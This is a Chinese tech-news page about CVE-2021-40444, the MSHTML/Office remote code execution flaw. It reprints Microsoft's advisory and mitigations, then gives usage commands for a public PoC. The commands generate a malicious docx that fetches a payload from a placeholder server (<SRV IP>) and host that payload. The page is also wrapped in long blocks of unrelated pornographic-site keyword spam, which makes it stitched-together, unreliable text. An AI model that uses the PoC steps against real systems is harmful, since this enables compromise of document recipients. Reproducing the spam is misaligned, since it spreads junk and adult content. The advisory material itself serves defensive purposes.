精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

微軟Office Word遠程代碼執行漏洞|CVE-2021-40444

安全 漏洞
Microsoft 正在調查 MSHTML 中一個影響 Microsoft Windows 的遠程代碼執行漏洞的報告。

 [[425270]]

漏洞描述

  Microsoft 正在調查 MSHTML 中一個影響 Microsoft Windows 的遠程代碼執行漏洞的報告。Microsoft 發現,存在嘗試通過特別設計的 Microsoft Office 文檔利用此漏洞的針對性攻擊。

  攻擊者可制作一個由托管瀏覽器呈現引擎的 Microsoft Office 文檔使用的惡意 ActiveX 控件。然后,攻擊者必須誘使用戶打開此惡意文件。在系統上配置為具有較少用戶權限的用戶帳戶比具有管理員權限的用戶帳戶所受影響要小。

  Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供檢測和防范已知漏洞的功能。客戶應將反惡意軟件產品保持最新狀態。使用自動更新的客戶不需要采取其他措施。管理更新的企業客戶應當選擇檢測版本 1.349.22.0 或更新版本,以將其部署于整個用戶環境中。Microsoft Defender for Endpoint 警報將顯示為:“Suspicious Cpl File Execution”。

  完成此調查后,Microsoft 將采取有助于保護客戶的適當措施。這可能包括,通過月度發布流程提供安全更新程序,或根據客戶需求不定期提供安全更新程序。

  請參閱緩解措施和解決方法部分,以了解有關保護您的系統免受此漏洞影響之措施的重要信息。

  更新 2021 年 9 月 14 日:Microsoft 已發布安全更新來解決此漏洞。有關適用于您系統的更新,請參閱“安全更新”表。我們建議您立即安裝這些更新。請參閱常見問題解答,以了解適用于您系統的重要信息。

  解決辦法

  在 Internet Explorer 中禁用所有 ActiveX 控件可以緩解這種攻擊。這可以通過使用“本地組策略編輯器”配置組策略或更新注冊表在所有站點中實現。之前安裝的 ActiveX 控件將繼續運行,但是不會受此漏洞的影響。

  如需通過組策略禁用 ActiveX 控件。

  在組策略設置中,導航到計算機配置 > 管理模板 > Windows 組件 > Internet Explorer > Internet 控制面板 > 安全頁面

  對于每個區域:

  1. 選擇區域(Internet 區域、Intranet 區域、本地計算機區域或受信任的站點區域)。
  2. 雙擊下載簽名的 ActiveX 控件并啟用政策。然后將政策中的選項設置為停用。
  3. 雙擊下載未簽名的 ActiveX 控件并啟用政策。然后將政策中的選項設置為停用。

  我們建議將此設置應用至所有區域,以充分保護您的系統。

  變通辦法的影響。

  這可將所有 64 位和 32 位進程的 Internet 區域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設置為禁用 (3)。 新的 ActiveX 控件將不會安裝。之前安裝的 ActiveX 控件將繼續運行。

  如需在單個系統中通過 RegKey 禁用 ActiveX 控件:

  警告如果您不正確地使用注冊表編輯器,則可能會導致嚴重問題(您或許需要重新安裝操作系統)。Microsoft 不保證您可以解決因錯誤使用注冊表編輯器而產生的問題。使用注冊表編輯器的風險由您自己承擔。

  1. 如需在所有區域的 Internet Explorer 中禁用安裝 ActiveX 控件,將以下內容粘貼到文本文件中,并使用 .reg 文件擴展名進行保存:
  1. Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]"1001"=dword:00000003"1004"=dword:00000003 
  1. 雙擊 .reg 文件將其應用到您的策略配置單元中。
  2. 重新啟動系統,以確保應用新配置。

  變通辦法的影響。

  這可將所有 64 位和 32 位進程的 Internet 區域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設置為禁用 (3)。 新的 ActiveX 控件將不會安裝。之前安裝的 ActiveX 控件將繼續運行。

  如何撤消變通辦法

  刪除之前在實施變通辦法過程中添加的注冊表項。

  如需在 Windows Explorer 中禁用預覽

  禁用 Shell Preview 可防止用戶在 Windows Explorer 中預覽文檔。針對您想防止預覽的各類文檔,請執行以下步驟:

  1. 在注冊表編輯器中,導航至合適的注冊表項:

  對于 Word 文檔:

  1. HKEY_CLASSES_ROOT.docx\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.doc\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.docm\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 

  對于多格式文本文件:

  1. HKEY_CLASSES_ROOT.rtf\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 
  1. 導出 RegKey 的副本以備份。
  2. 雙擊名稱并在編輯字符串對話框中,刪除“數值數據”。
  3. 單擊確定。

  變通辦法的影響

  用戶將無法在 Windows Explorer 中預覽文檔。

  如何撤消變通辦法

  雙擊您在變通辦法步驟二中創建的 .reg 文件。

  常見問題解答

  “安全更新”表中列有適用于 Windows 8.1、Windows Server 2012 R2 和 Windows Server 2012 的三類更新。我需要在我的系統中安裝什么更新來免受此漏洞的影響?

  運行 Windows 8.1、Windows Server 2012 R2 或 Windows Server 2012 的客戶可應用下列選項之一:月度匯總或僅安全更新和 IE 累積更新。

  我運行的是 Windows 7、Windows Server 2008 R2 或 Windows Server 2008。我需要應用月度匯總和 IE 累積更新嗎?

  • Windows 7、Windows Server 2008 R2 和 Windows Server 2008 的月度匯總中包含此漏洞的更新。應用月度匯總的客戶無需再應用 IE 累積更新。
  • 只應用僅安全更新的客戶還需要應用 IE 累積更新,以免受此漏洞的影響。

  CVE-2021-40444 PoC

  項目地址:

  GitHub: github.com/lockedbyte/CVE-2021-40444

  CVE-2021-40444(Microsoft Office Word 遠程代碼執行)惡意 docx 生成器利用工具 .

  此腳本的創建基于對野外使用的示例的一些逆向工程:

938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)

  你需要先安裝 lcab ( sudo apt-get install lcab)

  1. sudo apt-get install lcab 

  檢查REPRODUCE.md手動復制步驟

  如果您生成的 cab 不起作用,請嘗試將 exploit.html URL 指向 calc.cab

  使用方法

  首先生成一個給定 DLL 的惡意 docx 文檔,您可以使用從調用中test/calc.dll彈出 a 的那個calc.exesystem ()

  1. python3 exploit.py generate test/calc.dll http://<SRV IP> 

  生成惡意 docx(將位于out/)后,您可以設置服務器:

sudo python3 exploit.py host 80

  最后在 Windows 虛擬機中嘗試 docx:打開 word 成功彈出計算器.

  poc 下載地址:

  https://github.com/lockedbyte/CVE-2021-40444

 

責任編輯:張燕妮 來源: freebuf.com
相關推薦

2021-09-10 11:41:20

漏洞Windows 微軟

2017-01-19 20:37:58

office word漏洞下溢

2017-05-25 22:20:05

2019-05-15 15:20:01

微軟漏洞防護

2021-11-08 11:52:17

漏洞LinuxLinux TIPC

2017-05-27 10:22:37

2020-10-23 09:58:57

漏洞

2010-01-15 11:20:06

2020-10-25 09:39:49

漏洞分析

2017-06-15 17:28:36

2017-06-14 10:02:22

2009-05-31 15:34:37

2022-01-12 17:39:23

微軟補丁漏洞

2020-10-19 10:43:49

漏洞

2021-01-26 10:00:45

漏洞網絡安全網絡攻擊

2015-03-06 15:31:01

2021-09-16 14:06:55

遠程代碼漏洞微軟

2020-10-18 08:22:32

安全更新

2025-05-08 09:49:19

2025-09-25 16:48:16

點贊
收藏

51CTO技術棧公眾號

亚洲视频图片小说| 最新亚洲一区| 日韩欧美一区电影| 青青青国产在线观看| 国产日本在线| 国产精品一区二区无线| 8x拔播拔播x8国产精品| 国产又粗又长免费视频| av成人资源| 欧美日韩在线电影| avav在线播放| 1024国产在线| 99热精品国产| 亚洲最大福利视频网站| 天码人妻一区二区三区在线看 | 日韩美女一区| 女人18毛片一区二区三区| 男人的天堂久久精品| 久久久噜久噜久久综合| 少妇高潮一区二区三区喷水| 久草成人在线| 亚洲国产小视频| 国内精品国产三级国产aⅴ久| 天天综合网站| 亚洲va天堂va国产va久| 黄瓜视频免费观看在线观看www| 欧美男男同志| av福利精品导航| 91沈先生播放一区二区| 在线免费观看视频网站| 久久99伊人| 性色av一区二区三区免费| www欧美com| 91精品一区二区三区综合在线爱| 亚洲欧美激情四射在线日| 国产在线观看免费播放| 亚洲伊人伊成久久人综合网| 欧洲视频一区二区| 国产xxxxx在线观看| 成人bbav| 偷拍日韩校园综合在线| 美女黄色免费看| 伊人在我在线看导航| 中文字幕一区二区三区av| 日韩欧美一区二区三区久久婷婷| 日韩电影网址| 99精品视频在线观看| 国产精品免费在线| 亚洲女人18毛片水真多| 国产不卡视频一区| 999在线观看免费大全电视剧| 国产精品视频第一页| 久久草av在线| 91丨九色丨国产在线| 一级特黄aaa大片在线观看| 人人狠狠综合久久亚洲| 国产精品视频一| 中文字幕第31页| 久久99精品久久久久久国产越南 | 久久久久9999亚洲精品| 久久久久久久久久久久久9999| 神马午夜在线观看| 91日韩精品一区| 欧美日本亚洲| 在线免费av电影| 亚洲欧美激情在线| 黄色a级片免费看| 欧亚在线中文字幕免费| 欧美性开放视频| 午夜国产一区二区三区| 亚洲国产91视频| 精品美女在线播放| 黄色在线观看av| 青青草91久久久久久久久| 亚洲精品视频免费| 美女av免费看| 国产一区亚洲| 人妖精品videosex性欧美| 日日夜夜操视频| 精油按摩中文字幕久久| 国产二区一区| 搞黄视频在线观看| 亚洲欧美国产毛片在线| 久久精品国产sm调教网站演员| 黑人巨大精品欧美一区二区桃花岛| 欧美吻胸吃奶大尺度电影 | 成人天堂资源www在线| 精品国产一区二区三区麻豆免费观看完整版 | www.日韩欧美| 国产一级在线观看视频| 久久久亚洲人| 91久久伊人青青碰碰婷婷| 日韩在线视频免费| 国产精品你懂的在线| 国产激情片在线观看| 一二三四视频在线中文| 在线播放中文一区| 久久午夜夜伦鲁鲁片| 欧美gay男男猛男无套| 久久久天堂国产精品女人| 人人草在线观看| 国产ts人妖一区二区| 鲁丝片一区二区三区| 成人福利网站| 色婷婷综合久色| 日本少妇一级片| 色综合色综合| 性色av一区二区三区在线观看| 夜夜骚av一区二区三区| 26uuu精品一区二区| 国产对白在线播放| 国产精品久久久久av电视剧| 精品精品国产高清a毛片牛牛 | 一区二区三区**美女毛片| 成人午夜视频免费在线观看| 一区三区自拍| 日韩在线观看网站| 亚洲欧美另类在线视频| 成人动漫一区二区| 视色,视色影院,视色影库,视色网| 婷婷六月国产精品久久不卡| 亚洲白虎美女被爆操| 老熟妇高潮一区二区三区| 日本欧美一区二区三区乱码| 精品日本一区二区三区在线观看| gogo在线高清视频| 精品视频一区 二区 三区| 国产黄色网址在线观看| 亚洲黄色视屏| 国产精品一区二区av| 中中文字幕av在线| 69堂亚洲精品首页| av最新在线观看| 九一九一国产精品| 一区精品视频| 91麻豆精品国产综合久久久 | 久久久一区二区三区| 你真棒插曲来救救我在线观看| 精品午夜av| 欧美巨大黑人极品精男| 亚洲天堂手机版| 国产精品毛片大码女人| 天天色综合天天色| 久久国产成人午夜av影院宅| 国产伦精品一区二区三区精品视频 | 黄一区二区三区| 性欧美18一19内谢| 99精品视频在线免费播放| 久久精品国产2020观看福利| 国产免费黄色录像| 亚洲欧美另类久久久精品2019| 中文字幕剧情在线观看| 婷婷中文字幕一区| 亚洲精品日产aⅴ| 日本片在线观看| 日韩欧美国产一区在线观看| 妺妺窝人体色www聚色窝仙踪| 国产黄人亚洲片| 国产夫妻自拍一区| 日韩av网站在线免费观看| 91精品国产高清自在线| 欧美色视频免费| 欧美中文字幕亚洲一区二区va在线| caopeng视频| 久久99精品国产麻豆不卡| 正在播放久久| 国产香蕉精品| 国产97在线播放| 五月天婷婷在线视频| 欧美一区二区精品在线| 亚洲精品午夜久久久久久久| 99re这里只有精品视频首页| 狠狠热免费视频| 中文无码久久精品| 久久国产精品久久精品国产| 你懂得影院夜精品a| 久久精品一区中文字幕| 亚洲成人77777| 色综合激情久久| 欧美日韩色视频| caoporn国产精品| 欧美两根一起进3p做受视频| 婷婷亚洲图片| 久久本道综合色狠狠五月| 农村妇女一区二区| 欧美精品videos另类日本| 免费黄色在线视频网站| 91精品国产综合久久久蜜臀粉嫩| 国产稀缺真实呦乱在线| 欧美国产成人精品| 美女搡bbb又爽又猛又黄www| 日韩精品一二三四| 蜜桃视频一区二区在线观看| 九九视频免费观看视频精品| 亚洲一区二区三区毛片| 制服丝袜专区在线| 久久亚洲精品国产亚洲老地址| 网站黄在线观看| 9191成人精品久久| 伦av综合一区| 亚洲高清中文字幕| 午夜国产福利视频| 26uuu久久天堂性欧美| 少妇愉情理伦片bd| 免费在线观看成人| 国产精品沙发午睡系列| 一区二区三区午夜视频| 日本在线观看一区二区| 国产精品巨作av| 成人精品一区二区三区电影黑人| 在线播放高清视频www| 欧美www在线| 素人av在线| 亚洲最新在线视频| 色窝窝无码一区二区三区| 717成人午夜免费福利电影| 波多野结衣电车痴汉| 午夜电影一区二区三区| 特级片在线观看| 中文字幕一区免费在线观看| 亚洲永久精品ww.7491进入| 国产精品91xxx| 狠狠干狠狠操视频| 老司机午夜精品视频在线观看| 国产精品69久久久| 91精品国产麻豆国产在线观看 | 97人妻精品一区二区三区免| 国产精品一区在线观看乱码| 日本不卡一区二区在线观看| 青青国产91久久久久久| aaaaaa亚洲| 午夜亚洲影视| av免费中文字幕| 日韩一级精品| 尤物av无码色av无码| 在线成人欧美| 成人免费看片'免费看| 中文字幕午夜精品一区二区三区| 一区一区视频| 色天天综合网| 中文字幕色一区二区| 欧美日韩性在线观看| 日韩av一级大片| 精品国产91| 视频一区二区精品| 成人a'v在线播放| 亚洲a∨一区二区三区| 91麻豆精品国产91久久久平台| 亚洲三区视频| 91久久电影| 日本道在线视频| 午夜精品久久99蜜桃的功能介绍| 在线观看18视频网站| 欧美成人亚洲| 国产午夜福利100集发布| 一本色道久久综合亚洲精品不| 国产原创popny丨九色| 国产欧美亚洲一区| 成人黄色片视频| 日本伊人午夜精品| 国产成年人视频网站| 国产一区二区视频在线| 麻豆av免费看| 91丝袜高跟美女视频| 精品成人无码一区二区三区| 中文字幕一区三区| 欧美精品久久久久性色| 五月天国产精品| 国产免费www| 欧美一区二区三区公司| 人妻丰满熟妇av无码区hd| 精品亚洲男同gayvideo网站| seseavlu视频在线| 久久福利视频导航| 美女91在线看| 国产在线a不卡| 懂色av一区二区| 日本在线观看不卡| 欧美在线三级| 99re在线视频免费观看| 老司机午夜精品| 国产吃瓜黑料一区二区| 26uuu成人网一区二区三区| 国产传媒在线看| 亚洲国产一二三| 中文字幕一区二区久久人妻| 日韩视频永久免费| 男人天堂亚洲二区| 插插插亚洲综合网| 婷婷激情一区| 99在线观看视频| jizzjizz欧美69巨大| 欧美 日韩 国产精品| 麻豆精品网站| 国产在线观看免费播放| 欧美国产日韩一二三区| 日本视频www| 91麻豆精品国产91久久久久 | 中文字幕在线观看视频一区| 日韩视频免费观看高清完整版| 免费国产在线观看| 九九热在线精品视频| 电影亚洲一区| 国产一区自拍视频| 久久久久免费av| 男女视频一区二区三区| 不卡视频在线观看| 国产黄在线免费观看| 在线视频一区二区三| 少妇高潮一区二区三区69| 久久九九亚洲综合| 亚洲精品555| 欧美区高清在线| 国产午夜精品一区二区三区欧美| 欧美一级免费在线| 日本一二三不卡| 精品久久久久久久久久久久久久久久| 欧美一二三区精品| 日本不卡三区| 国产精品久久久久久久7电影 | 日韩高清免费观看| av片在线观看永久免费| 国产精品爽爽爽| 郴州新闻综合频道在线直播| 亚洲国产精品久久久久爰色欲| 国产.欧美.日韩| 深夜福利影院在线观看| 欧美精品久久久久久久久老牛影院| 日本精品专区| 欧美亚洲激情视频| 黄色网一区二区| 欧美视频在线观看视频| 激情综合亚洲精品| 成年人网站在线观看视频| 欧美在线高清视频| 国产福利在线视频| 日韩女优人人人人射在线视频| 天堂资源在线亚洲| 九色在线视频观看| 26uuu国产日韩综合| 日本中文字幕在线| 亚洲另类欧美自拍| 3d性欧美动漫精品xxxx软件| 日本a级片久久久| 日韩 欧美一区二区三区| 女人十八毛片嫩草av| 欧洲另类一二三四区| 色老头视频在线观看| 成人黄色在线播放| 欧美激情四色| 国产一级免费片| 欧美性xxxx在线播放| 国产高清在线| 国产欧美精品一区二区| 五月婷婷亚洲| 亚洲av综合色区无码另类小说| 亚洲一区二区三区不卡国产欧美 | 成人白浆超碰人人人人| 久久精品免费av| 精品视频久久久久久| 免费观看亚洲| 一区二区视频国产| 国产成人8x视频一区二区| 日韩免费一级片| 国产亚洲a∨片在线观看| 免费一级欧美在线观看视频| aaa免费在线观看| 成人一区二区三区视频在线观看| 日韩美女视频网站| 亚洲一级黄色av| 日韩一区二区三区高清在线观看| 亚洲一区二区三区av无码| 91丨porny丨首页| 亚洲天堂一二三| 欧美激情精品久久久久久变态| 思热99re视热频这里只精品 | 日韩一级片中文字幕| 日日噜噜噜夜夜爽亚洲精品| av成人资源| 国产一级特黄a大片免费| 成人欧美一区二区三区1314 | 日日狠狠久久偷偷四色综合免费 | 亚洲高清在线观看| 欧美精品高清| 成年丰满熟妇午夜免费视频| 久久亚洲综合色| 国产又黄又爽视频| 91精品国产乱码久久久久久蜜臀| 欧美手机在线| 亚洲美女高潮久久久| 欧美色视频一区| 91超碰在线| 一区中文字幕在线观看| 99久久综合国产精品| 一本久道久久综合无码中文| 97在线日本国产| 一本一道久久a久久精品蜜桃| 狠狠人妻久久久久久综合蜜桃| 91精品久久久久久蜜臀| 91精品论坛|